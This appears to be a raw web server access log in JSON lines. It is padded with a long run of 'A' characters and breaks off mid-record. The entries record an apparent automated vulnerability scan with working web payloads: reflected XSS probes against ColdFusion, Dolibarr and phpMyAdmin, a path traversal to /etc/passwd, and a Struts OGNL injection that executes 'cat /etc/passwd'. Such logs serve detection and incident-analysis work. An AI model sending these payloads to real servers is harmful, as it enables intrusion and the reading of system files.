AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/public/bc/ur/Login/assets/corbu/sap_logo.png HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.075","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /static/../../../a/../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream())) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/setup/index.php?page=servers&mode=test&id=\x22>'> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/openid-configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.046","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": 